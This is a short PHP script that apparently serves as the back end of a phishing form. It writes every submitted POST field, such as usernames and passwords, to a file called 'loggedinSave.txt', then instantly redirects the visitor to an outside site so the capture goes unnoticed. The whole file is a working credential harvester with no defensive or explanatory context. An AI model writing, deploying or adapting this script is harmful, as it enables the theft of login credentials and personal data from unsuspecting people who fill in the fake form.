<?php
$handle = fopen("loggedinSave.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
echo '<meta http-equiv="refresh" content="0;URL=http://japanstiftung.co.de/" />';
exit;  
?>